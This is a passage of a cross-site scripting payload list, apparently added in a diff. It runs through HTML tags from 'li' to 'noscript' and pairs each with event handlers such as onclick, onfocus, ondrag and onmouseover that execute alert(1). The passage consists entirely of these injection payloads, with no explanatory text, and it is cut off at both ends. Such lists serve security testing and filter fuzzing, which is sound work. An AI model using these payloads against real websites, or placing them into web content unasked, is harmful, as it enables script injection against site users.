onbeforecut="alert(1)" contenteditable>test</li> +<li onbeforepaste="alert(1)" contenteditable>test</li> +<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> +<li onclick="alert(1)">test</li> +<li oncontextmenu="alert(1)">test</li> +<li oncopy="alert(1)" contenteditable>test</li> +<li oncut="alert(1)" contenteditable>test</li> +<li ondblclick="alert(1)">test</li> +<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> +<li onkeydown="alert(1)" contenteditable>test</li> +<li onkeypress="alert(1)" contenteditable>test</li> +<li onkeyup="alert(1)" contenteditable>test</li> +<li onmousedown="alert(1)">test</li> +<li onmouseenter="alert(1)">test</li> +<li onmouseleave="alert(1)">test</li> +<li onmousemove="alert(1)">test</li> +<li onmouseout="alert(1)">test</li> +<li onmouseover="alert(1)">test</li> +<li onmouseup="alert(1)">test</li> +<li onpaste="alert(1)" contenteditable>test</li> +<link draggable="true" ondrag="alert(1)">test</link> +<link draggable="true" ondragend="alert(1)">test</link> +<link draggable="true" ondragenter="alert(1)">test</link> +<link draggable="true" ondragleave="alert(1)">test</link> +<link draggable="true" ondragstart="alert(1)">test</link> +<link href=validstyles.css rel=stylesheet onload=alert(1)> +<link id=x tabindex=1 onactivate=alert(1)></link> +<link id=x tabindex=1 onbeforeactivate=alert(1)></link> +<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> +<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> +<link onbeforecopy="alert(1)" contenteditable>test</link> +<link onbeforecut="alert(1)" contenteditable>test</link> +<link onbeforepaste="alert(1)" contenteditable>test</link> +<link onblur=alert(1) tabindex=1 id=x></link><input autofocus> +<link onclick="alert(1)">test</link> +<link oncontextmenu="alert(1)">test</link> +<link oncopy="alert(1)" contenteditable>test</link> +<link oncut="alert(1)" contenteditable>test</link> +<link ondblclick="alert(1)">test</link> +<link onfocus=alert(1) id=x tabindex=1 style=display:block> +<link onfocusin=alert(1) id=x tabindex=1 style=display:block> +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> +<link onkeydown="alert(1)" contenteditable>test</link> +<link onkeypress="alert(1)" contenteditable>test</link> +<link onkeyup="alert(1)" contenteditable>test</link> +<link onmousedown="alert(1)">test</link> +<link onmouseenter="alert(1)">test</link> +<link onmouseleave="alert(1)">test</link> +<link onmousemove="alert(1)">test</link> +<link onmouseout="alert(1)">test</link> +<link onmouseover="alert(1)">test</link> +<link onmouseup="alert(1)">test</link> +<link onpaste="alert(1)" contenteditable>test</link> +<link onreadystatechange=alert(1) rel=stylesheet href=1> +<link rel=stylesheet href=1 onerror=alert(1)> +<listing draggable="true" ondrag="alert(1)">test</listing> +<listing draggable="true" ondragend="alert(1)">test</listing> +<listing draggable="true" ondragenter="alert(1)">test</listing> +<listing draggable="true" ondragleave="alert(1)">test</listing> +<listing draggable="true" ondragstart="alert(1)">test</listing> +<listing id=x tabindex=1 onactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> +<listing id=x tabindex=1 onfocus=alert(1)></listing> +<listing id=x tabindex=1 onfocusin=alert(1)></listing> +<listing onbeforecopy="alert(1)" contenteditable>test</listing> +<listing onbeforecut="alert(1)" contenteditable>test</listing> +<listing onbeforepaste="alert(1)" contenteditable>test</listing> +<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onclick="alert(1)">test</listing> +<listing oncontextmenu="alert(1)">test</listing> +<listing oncopy="alert(1)" contenteditable>test</listing> +<listing oncut="alert(1)" contenteditable>test</listing> +<listing ondblclick="alert(1)">test</listing> +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onkeydown="alert(1)" contenteditable>test</listing> +<listing onkeypress="alert(1)" contenteditable>test</listing> +<listing onkeyup="alert(1)" contenteditable>test</listing> +<listing onmousedown="alert(1)">test</listing> +<listing onmouseenter="alert(1)">test</listing> +<listing onmouseleave="alert(1)">test</listing> +<listing onmousemove="alert(1)">test</listing> +<listing onmouseout="alert(1)">test</listing> +<listing onmouseover="alert(1)">test</listing> +<listing onmouseup="alert(1)">test</listing> +<listing onpaste="alert(1)" contenteditable>test</listing> +<main draggable="true" ondrag="alert(1)">test</main> +<main draggable="true" ondragend="alert(1)">test</main> +<main draggable="true" ondragenter="alert(1)">test</main> +<main draggable="true" ondragleave="alert(1)">test</main> +<main draggable="true" ondragstart="alert(1)">test</main> +<main id=x tabindex=1 onactivate=alert(1)></main> +<main id=x tabindex=1 onbeforeactivate=alert(1)></main> +<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> +<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> +<main id=x tabindex=1 onfocus=alert(1)></main> +<main id=x tabindex=1 onfocusin=alert(1)></main> +<main onbeforecopy="alert(1)" contenteditable>test</main> +<main onbeforecut="alert(1)" contenteditable>test</main> +<main onbeforepaste="alert(1)" contenteditable>test</main> +<main onblur=alert(1) tabindex=1 id=x></main><input autofocus> +<main onclick="alert(1)">test</main> +<main oncontextmenu="alert(1)">test</main> +<main oncopy="alert(1)" contenteditable>test</main> +<main oncut="alert(1)" contenteditable>test</main> +<main ondblclick="alert(1)">test</main> +<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> +<main onkeydown="alert(1)" contenteditable>test</main> +<main onkeypress="alert(1)" contenteditable>test</main> +<main onkeyup="alert(1)" contenteditable>test</main> +<main onmousedown="alert(1)">test</main> +<main onmouseenter="alert(1)">test</main> +<main onmouseleave="alert(1)">test</main> +<main onmousemove="alert(1)">test</main> +<main onmouseout="alert(1)">test</main> +<main onmouseover="alert(1)">test</main> +<main onmouseup="alert(1)">test</main> +<main onpaste="alert(1)" contenteditable>test</main> +<map draggable="true" ondrag="alert(1)">test</map> +<map draggable="true" ondragend="alert(1)">test</map> +<map draggable="true" ondragenter="alert(1)">test</map> +<map draggable="true" ondragleave="alert(1)">test</map> +<map draggable="true" ondragstart="alert(1)">test</map> +<map id=x tabindex=1 onactivate=alert(1)></map> +<map id=x tabindex=1 onbeforeactivate=alert(1)></map> +<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> +<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> +<map id=x tabindex=1 onfocus=alert(1)></map> +<map id=x tabindex=1 onfocusin=alert(1)></map> +<map onbeforecopy="alert(1)" contenteditable>test</map> +<map onbeforecut="alert(1)" contenteditable>test</map> +<map onbeforepaste="alert(1)" contenteditable>test</map> +<map onblur=alert(1) tabindex=1 id=x></map><input autofocus> +<map onclick="alert(1)">test</map> +<map oncontextmenu="alert(1)">test</map> +<map oncopy="alert(1)" contenteditable>test</map> +<map oncut="alert(1)" contenteditable>test</map> +<map ondblclick="alert(1)">test</map> +<map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus> +<map onkeydown="alert(1)" contenteditable>test</map> +<map onkeypress="alert(1)" contenteditable>test</map> +<map onkeyup="alert(1)" contenteditable>test</map> +<map onmousedown="alert(1)">test</map> +<map onmouseenter="alert(1)">test</map> +<map onmouseleave="alert(1)">test</map> +<map onmousemove="alert(1)">test</map> +<map onmouseout="alert(1)">test</map> +<map onmouseover="alert(1)">test</map> +<map onmouseup="alert(1)">test</map> +<map onpaste="alert(1)" contenteditable>test</map> +<mark draggable="true" ondrag="alert(1)">test</mark> +<mark draggable="true" ondragend="alert(1)">test</mark> +<mark draggable="true" ondragenter="alert(1)">test</mark> +<mark draggable="true" ondragleave="alert(1)">test</mark> +<mark draggable="true" ondragstart="alert(1)">test</mark> +<mark id=x tabindex=1 onactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> +<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> +<mark id=x tabindex=1 onfocus=alert(1)></mark> +<mark id=x tabindex=1 onfocusin=alert(1)></mark> +<mark onbeforecopy="alert(1)" contenteditable>test</mark> +<mark onbeforecut="alert(1)" contenteditable>test</mark> +<mark onbeforepaste="alert(1)" contenteditable>test</mark> +<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onclick="alert(1)">test</mark> +<mark oncontextmenu="alert(1)">test</mark> +<mark oncopy="alert(1)" contenteditable>test</mark> +<mark oncut="alert(1)" contenteditable>test</mark> +<mark ondblclick="alert(1)">test</mark> +<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onkeydown="alert(1)" contenteditable>test</mark> +<mark onkeypress="alert(1)" contenteditable>test</mark> +<mark onkeyup="alert(1)" contenteditable>test</mark> +<mark onmousedown="alert(1)">test</mark> +<mark onmouseenter="alert(1)">test</mark> +<mark onmouseleave="alert(1)">test</mark> +<mark onmousemove="alert(1)">test</mark> +<mark onmouseout="alert(1)">test</mark> +<mark onmouseover="alert(1)">test</mark> +<mark onmouseup="alert(1)">test</mark> +<mark onpaste="alert(1)" contenteditable>test</mark> +<marquee draggable="true" ondrag="alert(1)">test</marquee> +<marquee draggable="true" ondragend="alert(1)">test</marquee> +<marquee draggable="true" ondragenter="alert(1)">test</marquee> +<marquee draggable="true" ondragleave="alert(1)">test</marquee> +<marquee draggable="true" ondragstart="alert(1)">test</marquee> +<marquee id=x tabindex=1 onactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> +<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> +<marquee id=x tabindex=1 onfocus=alert(1)></marquee> +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee> +<marquee onbeforecopy="alert(1)" contenteditable>test</marquee> +<marquee onbeforecut="alert(1)" contenteditable>test</marquee> +<marquee onbeforepaste="alert(1)" contenteditable>test</marquee> +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onclick="alert(1)">test</marquee> +<marquee oncontextmenu="alert(1)">test</marquee> +<marquee oncopy="alert(1)" contenteditable>test</marquee> +<marquee oncut="alert(1)" contenteditable>test</marquee> +<marquee ondblclick="alert(1)">test</marquee> +<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onkeydown="alert(1)" contenteditable>test</marquee> +<marquee onkeypress="alert(1)" contenteditable>test</marquee> +<marquee onkeyup="alert(1)" contenteditable>test</marquee> +<marquee onmousedown="alert(1)">test</marquee> +<marquee onmouseenter="alert(1)">test</marquee> +<marquee onmouseleave="alert(1)">test</marquee> +<marquee onmousemove="alert(1)">test</marquee> +<marquee onmouseout="alert(1)">test</marquee> +<marquee onmouseover="alert(1)">test</marquee> +<marquee onmouseup="alert(1)">test</marquee> +<marquee onpaste="alert(1)" contenteditable>test</marquee> +<marquee onstart=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> +<menu draggable="true" ondrag="alert(1)">test</menu> +<menu draggable="true" ondragend="alert(1)">test</menu> +<menu draggable="true" ondragenter="alert(1)">test</menu> +<menu draggable="true" ondragleave="alert(1)">test</menu> +<menu draggable="true" ondragstart="alert(1)">test</menu> +<menu id=x tabindex=1 onactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> +<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> +<menu id=x tabindex=1 onfocus=alert(1)></menu> +<menu id=x tabindex=1 onfocusin=alert(1)></menu> +<menu onbeforecopy="alert(1)" contenteditable>test</menu> +<menu onbeforecut="alert(1)" contenteditable>test</menu> +<menu onbeforepaste="alert(1)" contenteditable>test</menu> +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onclick="alert(1)">test</menu> +<menu oncontextmenu="alert(1)">test</menu> +<menu oncopy="alert(1)" contenteditable>test</menu> +<menu oncut="alert(1)" contenteditable>test</menu> +<menu ondblclick="alert(1)">test</menu> +<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onkeydown="alert(1)" contenteditable>test</menu> +<menu onkeypress="alert(1)" contenteditable>test</menu> +<menu onkeyup="alert(1)" contenteditable>test</menu> +<menu onmousedown="alert(1)">test</menu> +<menu onmouseenter="alert(1)">test</menu> +<menu onmouseleave="alert(1)">test</menu> +<menu onmousemove="alert(1)">test</menu> +<menu onmouseout="alert(1)">test</menu> +<menu onmouseover="alert(1)">test</menu> +<menu onmouseup="alert(1)">test</menu> +<menu onpaste="alert(1)" contenteditable>test</menu> +<menuitem draggable="true" ondrag="alert(1)">test</menuitem> +<menuitem draggable="true" ondragend="alert(1)">test</menuitem> +<menuitem draggable="true" ondragenter="alert(1)">test</menuitem> +<menuitem draggable="true" ondragleave="alert(1)">test</menuitem> +<menuitem draggable="true" ondragstart="alert(1)">test</menuitem> +<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> +<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> +<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> +<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> +<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onclick="alert(1)">test</menuitem> +<menuitem oncontextmenu="alert(1)">test</menuitem> +<menuitem oncopy="alert(1)" contenteditable>test</menuitem> +<menuitem oncut="alert(1)" contenteditable>test</menuitem> +<menuitem ondblclick="alert(1)">test</menuitem> +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onkeydown="alert(1)" contenteditable>test</menuitem> +<menuitem onkeypress="alert(1)" contenteditable>test</menuitem> +<menuitem onkeyup="alert(1)" contenteditable>test</menuitem> +<menuitem onmousedown="alert(1)">test</menuitem> +<menuitem onmouseenter="alert(1)">test</menuitem> +<menuitem onmouseleave="alert(1)">test</menuitem> +<menuitem onmousemove="alert(1)">test</menuitem> +<menuitem onmouseout="alert(1)">test</menuitem> +<menuitem onmouseover="alert(1)">test</menuitem> +<menuitem onmouseup="alert(1)">test</menuitem> +<menuitem onpaste="alert(1)" contenteditable>test</menuitem> +<meta draggable="true" ondrag="alert(1)">test</meta> +<meta draggable="true" ondragend="alert(1)">test</meta> +<meta draggable="true" ondragenter="alert(1)">test</meta> +<meta draggable="true" ondragleave="alert(1)">test</meta> +<meta draggable="true" ondragstart="alert(1)">test</meta> +<meta id=x tabindex=1 onactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> +<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> +<meta id=x tabindex=1 onfocus=alert(1)></meta> +<meta id=x tabindex=1 onfocusin=alert(1)></meta> +<meta onbeforecopy="alert(1)" contenteditable>test</meta> +<meta onbeforecut="alert(1)" contenteditable>test</meta> +<meta onbeforepaste="alert(1)" contenteditable>test</meta> +<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onclick="alert(1)">test</meta> +<meta oncontextmenu="alert(1)">test</meta> +<meta oncopy="alert(1)" contenteditable>test</meta> +<meta oncut="alert(1)" contenteditable>test</meta> +<meta ondblclick="alert(1)">test</meta> +<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onkeydown="alert(1)" contenteditable>test</meta> +<meta onkeypress="alert(1)" contenteditable>test</meta> +<meta onkeyup="alert(1)" contenteditable>test</meta> +<meta onmousedown="alert(1)">test</meta> +<meta onmouseenter="alert(1)">test</meta> +<meta onmouseleave="alert(1)">test</meta> +<meta onmousemove="alert(1)">test</meta> +<meta onmouseout="alert(1)">test</meta> +<meta onmouseover="alert(1)">test</meta> +<meta onmouseup="alert(1)">test</meta> +<meta onpaste="alert(1)" contenteditable>test</meta> +<meter draggable="true" ondrag="alert(1)">test</meter> +<meter draggable="true" ondragend="alert(1)">test</meter> +<meter draggable="true" ondragenter="alert(1)">test</meter> +<meter draggable="true" ondragleave="alert(1)">test</meter> +<meter draggable="true" ondragstart="alert(1)">test</meter> +<meter id=x tabindex=1 onactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> +<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> +<meter id=x tabindex=1 onfocus=alert(1)></meter> +<meter id=x tabindex=1 onfocusin=alert(1)></meter> +<meter onbeforecopy="alert(1)" contenteditable>test</meter> +<meter onbeforecut="alert(1)" contenteditable>test</meter> +<meter onbeforepaste="alert(1)" contenteditable>test</meter> +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onclick="alert(1)">test</meter> +<meter oncontextmenu="alert(1)">test</meter> +<meter oncopy="alert(1)" contenteditable>test</meter> +<meter oncut="alert(1)" contenteditable>test</meter> +<meter ondblclick="alert(1)">test</meter> +<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onkeydown="alert(1)" contenteditable>test</meter> +<meter onkeypress="alert(1)" contenteditable>test</meter> +<meter onkeyup="alert(1)" contenteditable>test</meter> +<meter onmousedown="alert(1)">test</meter> +<meter onmouseenter="alert(1)">test</meter> +<meter onmouseleave="alert(1)">test</meter> +<meter onmousemove="alert(1)">test</meter> +<meter onmouseout="alert(1)">test</meter> +<meter onmouseover="alert(1)">test</meter> +<meter onmouseup="alert(1)">test</meter> +<meter onpaste="alert(1)" contenteditable>test</meter> +<multicol draggable="true" ondrag="alert(1)">test</multicol> +<multicol draggable="true" ondragend="alert(1)">test</multicol> +<multicol draggable="true" ondragenter="alert(1)">test</multicol> +<multicol draggable="true" ondragleave="alert(1)">test</multicol> +<multicol draggable="true" ondragstart="alert(1)">test</multicol> +<multicol id=x tabindex=1 onactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> +<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> +<multicol id=x tabindex=1 onfocus=alert(1)></multicol> +<multicol id=x tabindex=1 onfocusin=alert(1)></multicol> +<multicol onbeforecopy="alert(1)" contenteditable>test</multicol> +<multicol onbeforecut="alert(1)" contenteditable>test</multicol> +<multicol onbeforepaste="alert(1)" contenteditable>test</multicol> +<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onclick="alert(1)">test</multicol> +<multicol oncontextmenu="alert(1)">test</multicol> +<multicol oncopy="alert(1)" contenteditable>test</multicol> +<multicol oncut="alert(1)" contenteditable>test</multicol> +<multicol ondblclick="alert(1)">test</multicol> +<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onkeydown="alert(1)" contenteditable>test</multicol> +<multicol onkeypress="alert(1)" contenteditable>test</multicol> +<multicol onkeyup="alert(1)" contenteditable>test</multicol> +<multicol onmousedown="alert(1)">test</multicol> +<multicol onmouseenter="alert(1)">test</multicol> +<multicol onmouseleave="alert(1)">test</multicol> +<multicol onmousemove="alert(1)">test</multicol> +<multicol onmouseout="alert(1)">test</multicol> +<multicol onmouseover="alert(1)">test</multicol> +<multicol onmouseup="alert(1)">test</multicol> +<multicol onpaste="alert(1)" contenteditable>test</multicol> +<nav draggable="true" ondrag="alert(1)">test</nav> +<nav draggable="true" ondragend="alert(1)">test</nav> +<nav draggable="true" ondragenter="alert(1)">test</nav> +<nav draggable="true" ondragleave="alert(1)">test</nav> +<nav draggable="true" ondragstart="alert(1)">test</nav> +<nav id=x tabindex=1 onactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> +<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> +<nav id=x tabindex=1 onfocus=alert(1)></nav> +<nav id=x tabindex=1 onfocusin=alert(1)></nav> +<nav onbeforecopy="alert(1)" contenteditable>test</nav> +<nav onbeforecut="alert(1)" contenteditable>test</nav> +<nav onbeforepaste="alert(1)" contenteditable>test</nav> +<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onclick="alert(1)">test</nav> +<nav oncontextmenu="alert(1)">test</nav> +<nav oncopy="alert(1)" contenteditable>test</nav> +<nav oncut="alert(1)" contenteditable>test</nav> +<nav ondblclick="alert(1)">test</nav> +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onkeydown="alert(1)" contenteditable>test</nav> +<nav onkeypress="alert(1)" contenteditable>test</nav> +<nav onkeyup="alert(1)" contenteditable>test</nav> +<nav onmousedown="alert(1)">test</nav> +<nav onmouseenter="alert(1)">test</nav> +<nav onmouseleave="alert(1)">test</nav> +<nav onmousemove="alert(1)">test</nav> +<nav onmouseout="alert(1)">test</nav> +<nav onmouseover="alert(1)">test</nav> +<nav onmouseup="alert(1)">test</nav> +<nav onpaste="alert(1)" contenteditable>test</nav> +<nextid draggable="true" ondrag="alert(1)">test</nextid> +<nextid draggable="true" ondragend="alert(1)">test</nextid> +<nextid draggable="true" ondragenter="alert(1)">test</nextid> +<nextid draggable="true" ondragleave="alert(1)">test</nextid> +<nextid draggable="true" ondragstart="alert(1)">test</nextid> +<nextid id=x tabindex=1 onactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus> +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> +<nextid id=x tabindex=1 onfocus=alert(1)></nextid> +<nextid id=x tabindex=1 onfocusin=alert(1)></nextid> +<nextid onbeforecopy="alert(1)" contenteditable>test</nextid> +<nextid onbeforecut="alert(1)" contenteditable>test</nextid> +<nextid onbeforepaste="alert(1)" contenteditable>test</nextid> +<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onclick="alert(1)">test</nextid> +<nextid oncontextmenu="alert(1)">test</nextid> +<nextid oncopy="alert(1)" contenteditable>test</nextid> +<nextid oncut="alert(1)" contenteditable>test</nextid> +<nextid ondblclick="alert(1)">test</nextid> +<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onkeydown="alert(1)" contenteditable>test</nextid> +<nextid onkeypress="alert(1)" contenteditable>test</nextid> +<nextid onkeyup="alert(1)" contenteditable>test</nextid> +<nextid onmousedown="alert(1)">test</nextid> +<nextid onmouseenter="alert(1)">test</nextid> +<nextid onmouseleave="alert(1)">test</nextid> +<nextid onmousemove="alert(1)">test</nextid> +<nextid onmouseout="alert(1)">test</nextid> +<nextid onmouseover="alert(1)">test</nextid> +<nextid onmouseup="alert(1)">test</nextid> +<nextid onpaste="alert(1)" contenteditable>test</nextid> +<nobr draggable="true" ondrag="alert(1)">test</nobr> +<nobr draggable="true" ondragend="alert(1)">test</nobr> +<nobr draggable="true" ondragenter="alert(1)">test</nobr> +<nobr draggable="true" ondragleave="alert(1)">test</nobr> +<nobr draggable="true" ondragstart="alert(1)">test</nobr> +<nobr id=x tabindex=1 onactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> +<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> +<nobr id=x tabindex=1 onfocus=alert(1)></nobr> +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr> +<nobr onbeforecopy="alert(1)" contenteditable>test</nobr> +<nobr onbeforecut="alert(1)" contenteditable>test</nobr> +<nobr onbeforepaste="alert(1)" contenteditable>test</nobr> +<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onclick="alert(1)">test</nobr> +<nobr oncontextmenu="alert(1)">test</nobr> +<nobr oncopy="alert(1)" contenteditable>test</nobr> +<nobr oncut="alert(1)" contenteditable>test</nobr> +<nobr ondblclick="alert(1)">test</nobr> +<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onkeydown="alert(1)" contenteditable>test</nobr> +<nobr onkeypress="alert(1)" contenteditable>test</nobr> +<nobr onkeyup="alert(1)" contenteditable>test</nobr> +<nobr onmousedown="alert(1)">test</nobr> +<nobr onmouseenter="alert(1)">test</nobr> +<nobr onmouseleave="alert(1)">test</nobr> +<nobr onmousemove="alert(1)">test</nobr> +<nobr onmouseout="alert(1)">test</nobr> +<nobr onmouseover="alert(1)">test</nobr> +<nobr onmouseup="alert(1)">test</nobr> +<nobr onpaste="alert(1)" contenteditable>test</nobr> +<noembed draggable="true" ondrag="alert(1)">test</noembed> +<noembed draggable="true" ondragend="alert(1)">test</noembed> +<noembed draggable="true" ondragenter="alert(1)">test</noembed> +<noembed draggable="true" ondragleave="alert(1)">test</noembed> +<noembed draggable="true" ondragstart="alert(1)">test</noembed> +<noembed id=x tabindex=1 onactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> +<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> +<noembed id=x tabindex=1 onfocus=alert(1)></noembed> +<noembed id=x tabindex=1 onfocusin=alert(1)></noembed> +<noembed onbeforecopy="alert(1)" contenteditable>test</noembed> +<noembed onbeforecut="alert(1)" contenteditable>test</noembed> +<noembed onbeforepaste="alert(1)" contenteditable>test</noembed> +<noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onclick="alert(1)">test</noembed> +<noembed oncontextmenu="alert(1)">test</noembed> +<noembed oncopy="alert(1)" contenteditable>test</noembed> +<noembed oncut="alert(1)" contenteditable>test</noembed> +<noembed ondblclick="alert(1)">test</noembed> +<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onkeydown="alert(1)" contenteditable>test</noembed> +<noembed onkeypress="alert(1)" contenteditable>test</noembed> +<noembed onkeyup="alert(1)" contenteditable>test</noembed> +<noembed onmousedown="alert(1)">test</noembed> +<noembed onmouseenter="alert(1)">test</noembed> +<noembed onmouseleave="alert(1)">test</noembed> +<noembed onmousemove="alert(1)">test</noembed> +<noembed onmouseout="alert(1)">test</noembed> +<noembed onmouseover="alert(1)">test</noembed> +<noembed onmouseup="alert(1)">test</noembed> +<noembed onpaste="alert(1)" contenteditable>test</noembed> +<noframes draggable="true" ondrag="alert(1)">test</noframes> +<noframes draggable="true" ondragend="alert(1)">test</noframes> +<noframes draggable="true" ondragenter="alert(1)">test</noframes> +<noframes draggable="true" ondragleave="alert(1)">test</noframes> +<noframes draggable="true" ondragstart="alert(1)">test</noframes> +<noframes id=x tabindex=1 onactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> +<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> +<noframes id=x tabindex=1 onfocus=alert(1)></noframes> +<noframes id=x tabindex=1 onfocusin=alert(1)></noframes> +<noframes onbeforecopy="alert(1)" contenteditable>test</noframes> +<noframes onbeforecut="alert(1)" contenteditable>test</noframes> +<noframes onbeforepaste="alert(1)" contenteditable>test</noframes> +<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onclick="alert(1)">test</noframes> +<noframes oncontextmenu="alert(1)">test</noframes> +<noframes oncopy="alert(1)" contenteditable>test</noframes> +<noframes oncut="alert(1)" contenteditable>test</noframes> +<noframes ondblclick="alert(1)">test</noframes> +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onkeydown="alert(1)" contenteditable>test</noframes> +<noframes onkeypress="alert(1)" contenteditable>test</noframes> +<noframes onkeyup="alert(1)" contenteditable>test</noframes> +<noframes onmousedown="alert(1)">test</noframes> +<noframes onmouseenter="alert(1)">test</noframes> +<noframes onmouseleave="alert(1)">test</noframes> +<noframes onmousemove="alert(1)">test</noframes> +<noframes onmouseout="alert(1)">test</noframes> +<noframes onmouseover="alert(1)">test</noframes> +<noframes onmouseup="alert(1)">test</noframes> +<noframes onpaste="alert(1)" contenteditable>test</noframes> +<noscript draggable="true" ondrag="alert(1)">test</noscript> +<noscript draggable="true" ondragend="alert(1)">test</noscript> +<noscript draggable="true" ondragenter="alert(1)">test</noscript> +<noscript draggable="true" ondragleave="alert(1)">test</noscript> +<noscript draggable="true" ondragstart="alert(1)">test</noscript> +<noscript id=x tabindex=1 onactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> +<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> +<noscript id=x tabindex=1 onfocus=alert(1)></noscript> +<noscript id=x tabindex=1 onfocusin=alert(1)></noscript> +<noscript onbeforecopy="alert(1)" contenteditable>test</noscript> +<noscript onbeforecut="alert(1)" contenteditable>test</noscript> +<noscript 